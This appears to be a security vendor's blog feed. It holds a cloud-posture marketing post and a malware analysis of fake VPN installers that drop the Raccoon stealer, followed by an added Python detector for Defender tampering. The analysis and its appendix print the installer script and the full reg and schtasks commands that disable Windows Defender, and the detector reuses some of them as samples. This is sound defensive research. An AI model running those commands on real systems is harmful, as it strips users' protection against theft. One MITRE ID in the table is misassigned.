Cloud infrastructures are constantly changing; enterprises need to continuously monitor multicloud environments and identify gaps between stated security policies and actual security posture. Proper security not only reduces the possibility of a data breach but also minimizes the damage if an attack succeeds in gaining access to your cloud environment. When a major organization has a security breach, it always hits the headlines. Security breach examples include the following:

The Capital One data breach in 2019 was one of the most devastating data breaches of all time. The attack occurred due to a misconfiguration error at the firewall’s application layer. Impact: 80,000 bank account numbers; exposure of more than a million records with personal information, including Social Security numbers.

The Instagram breach involved a partner, Chtrbox, that had left a database exposed on Amazon Web Services. Impact: 50 million "influencer" records exposed.

Maintaining a secure posture ensures that enterprises have a systematic approach toward risk and possible exposure. It also establishes guidelines for prioritizing risks and for how to respond to and remediate them. Hence, CloudOps and security teams tasked with securing the organization’s multicloud environments have focused on Cloud Security Posture Management, or CSPM. CSPM is described as “a continuous process of cloud security improvement and adaptation to reduce the likelihood of a successful attack.”

Keeping up with the rate of change

There are many elements to public cloud security posture management. Considering the above factors, we have outlined a few best practices to maintain a healthy and secure posture in a public multicloud environment.

Gain visibility into disparate, multicloud infrastructure (single pane of glass)

Cloud service providers (CSPs) offer native monitoring tools that can be helpful to an extent.
Still, they have limitations, especially when it comes to getting detailed context and visibility across multicloud environments. The first step is to get complete, comprehensive visibility into multicloud infrastructure and security posture. Enterprises can’t maintain a security posture without a complete overview of IT assets. They need to discover and track all assets and inventory (both current and historical) with configuration status.

Monitor misconfigurations

Misconfiguration errors are ranked as the second-most significant cloud security threat. In the competitive cloud environment, CSPs are constantly changing and improving their services. Thousands of settings and configurations increase the likelihood of a human error resulting in misconfiguration. While attacks are getting more frequent and sophisticated, SecOps teams need to effectively monitor the cloud environment to detect configuration errors, policy violations, and associated risks across multiple accounts, regions, and cloud providers.

Automate governance and remediation

Continuously monitor cloud security posture against established security best practices and benchmarks, such as those from the Center for Internet Security (CIS), to detect vulnerabilities and policy violations. Benchmark and check cloud resource configurations against popular compliance frameworks such as PCI DSS for retail and HIPAA for healthcare. Set up industry-specific private benchmarks and apply them to specific cloud accounts. Remediate any discovered issues automatically or with minimal manual intervention. Embed compliance checks in existing DevOps deployment (CI/CD) pipelines to detect and correct compliance deficiencies in early-stage testing environments.

Team collaboration

Distribute cloud security responsibility across the organization to critical stakeholders, ensuring security and compliance in a dynamic environment.
Implement and enforce policies on cloud ownership, responsibility, and risk acceptance by outlining expectations, significance, and control of cloud use. Prioritize efforts according to security risk and business impact. Focus efforts on issues that can affect critical cloud assets and can publicly expose data or assets. Automatically assign owners/teams to security incidents through ITSM tools such as ServiceNow or Zendesk.

Looking ahead

Industry trends show a substantial migration of workloads to the public cloud, and the rapid adoption of cloud-based software-as-a-service offerings signifies that it will continue for quite some time. As organizations increase their public cloud footprint, they will encounter cloud-specific risk, security, and compliance threats, which are challenging to address without the right tools and processes.

“Nearly all successful attacks on cloud services result from customer misconfiguration, mismanagement, and mistakes. Security and risk management leaders should invest in cloud security posture management processes and tools to proactively identify and remediate these risks." – Gartner

Zscaler CSPM can help enterprises maintain a secure posture in a multicloud environment. It continuously monitors cloud risk through identification, prioritization, and remediation based on common frameworks, regulatory requirements, and organization policies. By extending these solutions directly into the development process, security teams can proactively identify and remediate cloud risks before production.

Benefits of Zscaler CSPM

A complete view of multicloud security posture – Zscaler CSPM provides an “at-a-glance” comprehensive picture of your cloud inventory, the location of assets across global regions, and complete visibility into the public cloud security posture of all assets and resources.
Continuous monitoring – Zscaler CSPM continuously monitors and assesses cloud assets and resources for misconfigurations and non-standard deployments. The scan data is synchronized for new and updated assets. The dashboard provides precise analysis and evidence of security and compliance issues and offers remediation methods to mitigate problems.

Automated security using REST APIs – Zscaler CSPM fully supports REST APIs for seamless integration with the CI/CD toolchain. It helps DevSecOps teams with real-time assessments of potential risks and exposures so that they can mitigate risks before deploying apps into production.

The public multicloud environment has many advantages and, as long as enterprises use it for these advantages, it will continue to be exploited and targeted. However, implementing the right tools and strategies can help the enterprise maintain a secure cloud posture.

Learn more at

Wed, 19 May 2021 08:00:02 -0700 Mahesh Nawale

Threat Actors Distribute Malicious VPN Apps Masquerading as Popular Vendors

Introduction

In May 2021, Zscaler ThreatLabZ observed several new domains registered by a threat actor for the distribution of spoofed and malicious versions of popular VPN software. Threat actors have shifted their tactics, techniques, and procedures (TTPs) to target VPN users over the past year, taking advantage of the increase in remote work and the popularity of VPN applications. We observed this particular actor spoofing VPN applications, such as NordVPN, F-Secure Freedome VPN, Avast SecureLine VPN, and Hotspot Shield, to distribute the infostealer known as Raccoon stealer. Several lookalike websites containing malicious download links were hosted on domains registered by the actor in May 2021 using the Njalla domain hosting provider. Njalla has been used in the past by advanced persistent threat (APT) actors, such as Lazarus and Sandworm.
ThreatLabZ closely monitors the network infrastructure used by these threat actors, which led to the discovery of this campaign. For this blog, we performed a deep-dive technical analysis of the malicious setup files, the evasion techniques used, and the final payload delivered.

Attack flow

The attack starts when users visit a lookalike website registered by the threat actor to distribute VPN applications. As an example, the domain vpnnords[.]com was registered by the attacker and used to host the webpage shown in Figure 1. This page looks almost identical to the homepage of the legitimate NordVPN website. The only difference is that the “Download Free” button on this page leads to the download of a malicious NordVPN setup file hosted on a file-sharing website. The complete list of domains registered by the attacker to target VPN users is included in the IOCs section.

Figure 1: Malicious webpage that looks similar to the legitimate NordVPN website

Download link of setup file: hxxps://filetransfer[.]io/data-package/tZCy19qQ/download

The downloaded file looks like a legitimate NordVPN setup file—it uses the same file icon and even displays the graphical user interface (GUI) of NordVPN—but performs malicious activities in the background, which we describe in detail in the technical analysis section.

Low detection by security vendors

All the domains used in this attack and registered by the threat actor have no detections on VirusTotal, and all security vendors mark these domains as clean. One such example is shown in Figure 2.

Figure 2: No detection for the malicious domain(s) on VirusTotal by security vendors

This highlights how this attack has been flying under the radar and the importance of proactive hunting techniques, which helped us discover these domains.
Technical analysis

For the purpose of technical analysis, we will consider the file with the MD5 hash e157f55aff49fe53befa3484d5e2b575.

Static analysis

Like the legitimate NordVPN setup file, the fake NordVPN setup is packaged using the Inno installer, but the file structure inside the package is different. Figure 3 below shows the file structure for both the legitimate and the fake setup.

Figure 3: File structure for Inno-packaged fake and legitimate NordVPN setup files

[+] Inside the fake installation package

As shown in Figure 3 above, the package contains the following files:

Legitimate NordVPN setup: NordVPNSetup.exe. This is the latest version of NordVPN, with MD5 hash 4e6183906dfe035954ec0260c573ab03.

Seven files for performing different malicious operations. These files are described in more detail in the “Component analysis” section.

The Inno package installer script: install_script.iss. All the files inside the package are encrypted using a password, as defined in the [Setup] section of the installer script.

Note: The Inno package installer script for the fake NordVPN setup is available in the appendix section.

[+] Component analysis

In this section, we perform a technical analysis of the individual components packaged inside the malicious setup file.

Naming convention of component files

All the script (VBS and BAT) file components in this package follow a naming convention: the first few characters indicate the purpose of the script, followed by a string of random characters.
Example:

    # STRT indicates starting or initialization
    STRTbbbn7przuvwav4hbpbps.vbs = “STRT” + “bbbn7przuvwav4hbpbps” + “.vbs”

    # AVD indicates AV disable
    AVDbbbn7i3b4ho55ck6raahj.bat = “AVD” + “bbbn7i3b4ho55ck6raahj” + “.bat”

    # DEL indicates delete the components and cleanup
    DELbbbn7l3bnchd166d2hhhv.bat = “DEL” + “bbbn7l3bnchd166d2hhhv” + “.bat”

VBScript analysis

MD5 hash: b5d6f5e514757d7b075ed59d79b8f2e2
Filename: STRTbbbn7przuvwav4hbpbps.vbs

This VBScript is large because it includes junk instructions that declare many variables never used anywhere in the code. After cleanup, the script looks as shown in Figure 4.

Figure 4: Cleaned-up VBScript

The main purpose of this script is to execute the three BAT files described in the next section. The VBScript inserts a delay between the execution of each BAT script, using a random delay value calculated as follows:

    Dim max, min
    max = 9890
    min = 4890
    Dim RNDM
    Randomize
    ' Rnd returns a value in [0, 1), so RNDM lands between min and max + min
    RNDM = ((max) * Rnd + min)

BAT files analysis

[Component #1: Disable security software]

MD5 hash: 7924178f4a19db114e1fbb2764b8b409
Filename: AVDbbbn7i3b4ho55ck6raahj.bat

This BAT file is mainly responsible for disabling security software on the machine. It specifically targets Windows Defender and Exploit Guard. To disable the security service features, it uses reg.exe to alter the Windows registry keys specific to Windows Defender and Exploit Guard. In addition, the file disables system services and scheduled tasks related to Windows Defender. Like the VBS file, this BAT file is large. This is because long strings of Base64-encoded data are included in the file and the commands are inserted between them, as shown in Figure 5.

Figure 5: Commands inserted between Base64-encoded blobs in the BAT file

The complete list of commands executed by this BAT file to disable security services and features is included in the Appendix.
[Component #2: Main]

MD5 hash: b3a6b11fcf113f692648bc8f0f3f898e
Filename: main.bat

This BAT file starts with a byte order mark (BOM) in its first two bytes, which causes Notepad++ or any other text editor to display only Unicode characters when the file is opened. The first two bytes are {0xFF 0xFE}, as shown in Figure 6.

Figure 6: Byte order mark (BOM) inserted in the first two bytes of the BAT file

Once we delete these two bytes, we can view the contents successfully with a text editor such as Notepad++, as shown in Figure 7.

Figure 7: Cleaned BAT file

The main actions performed by this BAT file are:

1. Creates a temp directory called "extracted" in the current directory
2. Renames the encrypted file.bin to
3. Decrypts and extracts the contents of using the password "___________7876pwd4897pwd19506___________"
4. Extracts all the components after decrypting and renames to file.bin
5. Executes sihost.exe

After further analysis, we discovered that an open-source anti-antivirus obfuscator was used to package the files. This obfuscator generates a BAT file and packages everything using 7zip to create an encrypted, password-protected, multilayer archive file. This GitHub project was used by the threat actor:

In our case, the archive file is called file.bin.

MD5 hash: b2880d44773178644ff13d755e96d5e2
Filename: file.bin

This is an encrypted ZIP archive that, when decrypted with the password “___________7876pwd4897pwd19506___________”, contains the following main component:

Sihost.exe - 32-bit .NET binary

[Component #3: Cleanup]

MD5 hash: 228c709d87e5ff50e7d5c05b1a7f6c03
Filename: DELbbbn7l3bnchd166d2hhhv.bat

Deletes all the components that were used in the initialization stage of the setup.
    @echo off
    timeout /T 60 /NOBREAK > Nul
    Del /f /q "AVDbbbn7i3b4ho55ck6raahj.bat"
    Del /f /q "STRTbbbn7przuvwav4hbpbps.vbs"
    Del /f /q "STR2bbbn7przuvwav4hbpbps.vbs"
    Del /f /q "7z.dll"
    Del /f /q "7z.exe"
    Del /f /q "main.bat"
    Del /f /q "file.bin"
    Del /f /q "LODbbbn7pkeaxe7obg0ydlex.bat"
    Del /f /q "DELbbbn7l3bnchd166d2hhhv.bat"

Dynamic analysis

When the Inno-packaged fake NordVPN setup is executed, it extracts the legitimate NordVPN setup file to the path "%ProgramFiles%\" or "%ProgramFiles(x86)%\", while all the files related to the malicious operation are extracted to the path "%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\". As per the [Run] section of the Inno installer script, the legitimate NordVPN setup is executed first, followed by the malicious VBScript. Operating in this order prevents the end user from suspecting that any malicious activity is being performed on the machine. Figure 8 below shows the installation window displayed to the end user as a result of the legitimate NordVPN setup execution while the malicious activity is performed in the background.

Figure 8: Installation window shown to the end user

[+] .NET binary analysis

As described earlier, the VBS and BAT scripts’ execution finally results in dropping and executing the .NET binary with the name sihost.exe. Like all the payloads in the infection chain, the .NET binary is obfuscated and consists of multiple layers that make binary analysis difficult and help to bypass AV products.

// Main binary

The main binary has the project name “StarEggControl”. On execution, it loads the next-layer binary, which is stored as an image in the resource section with the full resource path “StarEggControl.frmSolucao2.image1”, and is constructed using individual pixel information from the stored image. The code responsible for binary construction is shown in Figure 9 below.
Figure 9: Image-to-binary construction using individual pixels

Once the binary construction is complete, the binary is loaded as a runtime module. The module is a .NET DLL with the name SampleUI.dll. Code execution is transferred to this DLL by calling the SampleUI.MDI class with three parameters:

ugz1: "54776F5061746873" – Hex-encoded resource name for the next-layer binary
ugz3: "59596A6F71" – Hex-encoded key used to decrypt the next-layer binary
projname: “StarEggControl” – Project name of the main .NET binary

// SampleUI.dll

Like the previous layer, SampleUI.dll also loads the next-layer binary, which is stored as a bitmap image inside the resources of the main binary itself. The resource name decoded from the parameter ugz1 is "TwoPaths", and the full resource path is “StarEggControl.Resources.TwoPaths”. The next-layer binary is constructed from the retrieved bitmap image using a custom algorithm based on an XOR operation. The XOR key is derived from the parameter ugz3, which decodes to "YYjoq". The constructed binary is again loaded as a runtime module, which is also a .NET DLL, with the name “公jrxl的A太 wCe”. Code execution is transferred to the DLL by calling the class with the name “公jrxl的A太 wCe.d司J物rU族家的v行是o.z官司C生bqT的A”. Note that the class and method names inside the .NET binary contain Unicode characters to hinder static analysis and reverse engineering. Figure 10 below shows the code flow for binary construction, loading, and transfer of code execution.

Figure 10: Decoding the bitmap to binary and transferring execution

// 公jrxl的A太 wCe

This is the final layer, which is responsible for loading and executing the main malware payload of the infection chain. The malware payload is stored among the resources of this final-layer DLL with the resource name “ifF3K”. Like the previous layers, the main malware payload is present in encrypted form.
Executing further, the malware payload is decrypted, a new suspended instance of the main .NET binary sihost.exe is created, and the malware payload is injected into the suspended process using the process hollowing injection technique. The injected malware payload is the well-known information stealer known as Raccoon stealer.

Similar builds but different themes

Pivoting on the package build, we found more than 500 samples (more than 50% of these samples have fewer than 10 detections) and two additional themes being used to deliver the malware payload—one related to multimedia applications and the other to security software. We have not confirmed whether Raccoon stealer is the final payload for all the samples, but they seem similar to the current attack.

Zscaler Cloud Sandbox report

Figure 11: Zscaler Cloud Sandbox report

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels:

- HTML.MalURL.NordVPN
- Win32.PWS.Raccoon

MITRE ATT&CK TTP mapping

ID | Technique | Description
T1566 | Phishing | Attacker-hosted fake websites leading to malicious file download
T1204.002 | User Execution: Malicious File | User executes the downloaded file
T1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads
T1027.002 | Obfuscated Files or Information: Software Packing | Payloads are packed in layers
T1070.004 | Indicator Removal on Host: File Deletion | Deletes all the components that were used in the initialization stage
T1055.012 | Process Injection: Process Hollowing | Uses the hollow process injection technique to execute the final malware payload
T1562 | Impair Defenses | Disables Windows Defender features and log audits
T1124 | System Time Discovery | One of Raccoon’s capabilities
T1087 | Account Discovery | One of Raccoon’s capabilities
T1124 | File and Directory Discovery | One of Raccoon’s capabilities
T1057 | Process Discovery | One of Raccoon’s capabilities
T1012 | Query Registry | One of Raccoon’s capabilities
T1113 | Screen Capture | One of Raccoon’s capabilities
T1082 | System Information Discovery | One of Raccoon’s capabilities
T1016 | System Network Configuration Discovery | One of Raccoon’s capabilities
T1573.001 | Encrypted Channel: Symmetric Cryptography | One of Raccoon’s capabilities

Indicators of compromise

Hashes

MD5 | Description
e157f55aff49fe53befa3484d5e2b575 | NordVPNsetup.exe
b5d6f5e514757d7b075ed59d79b8f2e2 | STRTbbbn7przuvwav4hbpbps.vbs
7924178f4a19db114e1fbb2764b8b409 | AVDbbbn7i3b4ho55ck6raahj.bat
b3a6b11fcf113f692648bc8f0f3f898e | main.bat
228c709d87e5ff50e7d5c05b1a7f6c03 | DELbbbn7l3bnchd166d2hhhv.bat
b2880d44773178644ff13d755e96d5e2 | file.bin
0d2acc1da9ea3c2f98bcbc3ce872beb7 | Raccoon Stealer

// A few other VPN packages

MD5 | Description
67516c2a72880e674795b0a9a1edcb36 | FSecureFreedomeVPN.exe
fabc80d1a8c2c580f04550c34247e24d | avast_vpn_online_setup.x64.exe

Malicious domains

vpnnords[.]com
nordsfreevpn[.]com
nordsecure[.]click
vpn-nord[.]net

Dropped files

%ProgramFiles%\NordVPNSetup.exe OR %ProgramFiles(x86)%\NordVPNSetup.exe
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\7z.exe
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\7z.dll
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\file.bin
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\main.bat
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs
%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\sihost.exe

Appendix

// install_script.iss from fake NordVPN Inno package

    ;InnoSetupVersion=6.0.0 (Unicode)

    [Setup]
    AppName=SZUCiTYOSZUCiTYO IJiEalgWu
    AppId=SZUCiTYOSZUCiTYO IJiEalgWu
    AppVersion=
    AppPublisher=EalgWuSZUCiTYOIJi EalgWu
    DefaultDirName={autopf}
    OutputBaseFilename=NordVPNSetup
    Compression=lzma
    ; Encryption=yes
    ; PasswordHash=b525fbe0090152aa48b9e832d1c72bdc48e94461
    ; PasswordSalt=702a76b833fdb38f
    Uninstallable=no
    DisableDirPage=yes
    DisableProgramGroupPage=yes
    WizardImageFile=embedded\WizardImage0.bmp
WizardSmallImageFile=embedded\WizardSmallImage0.bmp [Files] Source: "{app}\NordVPNSetup.exe"; DestDir: "{app}"; MinVersion: 0.0,6.0; Flags: deleteafterinstall ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.exe"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.dll"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\file.bin"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\main.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion [Run] Filename: "{app}\NordVPNSetup.exe"; Description: "{cm:LaunchProgram,SZUCiTYOSZUCiTYO IJiEalgWu}"; MinVersion: 0.0,6.0; Flags: postinstall skipifsilent nowait Filename: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; Description: "{cm:LaunchProgram,Generator}"; MinVersion: 0.0,6.0; Flags: shellexec nowait [CustomMessages] default.NameAndVersion=%1 version %2 default.AdditionalIcons=Additional shortcuts: default.CreateDesktopIcon=Create a &desktop shortcut default.CreateQuickLaunchIcon=Create a &Quick Launch shortcut default.ProgramOnTheWeb=%1 on the Web default.UninstallProgram=Uninstall %1 default.LaunchProgram=Launch %1 default.AssocFileExtension=&Associate %1 with the %2 file extension default.AssocingFileExtension=Associating %1 with the 
%2 file extension... default.AutoStartProgramGroupDescription=Startup: default.AutoStartProgram=Automatically start %1 default.AddonHostProgramNotFound=%1 could not be located in the folder you selected.%n%nDo you want to continue anyway? [Languages] ; These files are stubs ; To achieve better results after recompilation, use the real language files Name: "default"; MessagesFile: "embedded\default.isl"; // Commands executed to disable system security services reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f" 
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" // Altering scheduled tasks on the machine related to security services. 
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable Fri, 21 May 2021 12:44:08 -0700 Sudeep Singh
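The reg and schtasks commands in the appendix are the concrete form of T1562 (Impair Defenses) in this campaign. As an added example that is not part of the original post, the Python below classifies process-creation command lines (for instance the CommandLine field of Sysmon Event ID 1 or Windows event 4688) that reproduce those Defender registry, service and scheduled-task changes; the sample command lines are constructed here, and the key and task prefixes are assumed from the appendix rather than being a complete inventory of Defender settings.

```python
import re

# Prefixes (lower-cased) of the registry keys and task paths touched by the appendix commands
DEFENDER_KEYS = (
    "hklm\\software\\microsoft\\windows defender",
    "hklm\\software\\policies\\microsoft\\windows defender",
    "hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defender",
    "hklm\\system\\currentcontrolset\\services\\wd",  # WdBoot, WdFilter, WdNisDrv, WdNisSvc
    "hklm\\system\\currentcontrolset\\services\\windefend",
)
DEFENDER_TASKS = ("microsoft\\windows\\windows defender\\", "microsoft\\windows\\exploitguard\\")
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # a quoted argument or a bare word

def tokenize(cmdline):
    return [quoted if quoted else bare for quoted, bare in TOKEN_RE.findall(cmdline)]

def flag_value(tokens, flag):
    low = [t.lower() for t in tokens]  # reg/schtasks switches are case-insensitive
    return tokens[low.index(flag) + 1] if flag in low and low.index(flag) + 1 < len(tokens) else None

def classify(cmdline):
    """Return a short reason if the command line tampers with Defender, else None."""
    t = tokenize(cmdline)
    if len(t) >= 3 and t[0].lower() == "reg" and t[1].lower() in ("add", "delete"):
        op, key = t[1].lower(), t[2].lower().rstrip("\\")
        name, data = flag_value(t, "/v"), flag_value(t, "/d")
        if key.startswith(DEFENDER_KEYS):
            if op == "delete":
                return "deletes Defender key " + key
            if name and name.lower() == "start" and data == "4":  # 4 = SERVICE_DISABLED
                return "disables Defender service " + key.rsplit("\\", 1)[-1] + " (Start=4)"
            return "sets " + (name or "(default)") + " in " + key
        if op == "delete" and name and name.lower() == "securityhealth":
            return "removes SecurityHealth autorun entry"
    elif t and t[0].lower() == "schtasks" and "/disable" in (x.lower() for x in t):
        task = flag_value(t, "/tn")
        if task and task.lower().startswith(DEFENDER_TASKS):
            return "disables scheduled task " + task
    return None

def scan(cmdlines):
    return [(i, r) for i, r in enumerate(map(classify, cmdlines)) if r]

SAMPLE_CMDS = [  # constructed process-creation command lines modelled on the appendix
    'reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    'reg delete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "SecurityHealth" /f',
    'reg add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    'schtasks /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable',
    'reg add "HKCU\\Software\\Contoso\\App" /v "Theme" /t REG_SZ /d "dark" /f',  # benign, must not fire
]
```

Calling scan(SAMPLE_CMDS) flags the first four entries and leaves the benign HKCU write alone; a single reg add against any of the policy keys is already enough to alert on, since the legitimate path for these settings is Group Policy, not reg.exe run from a batch file.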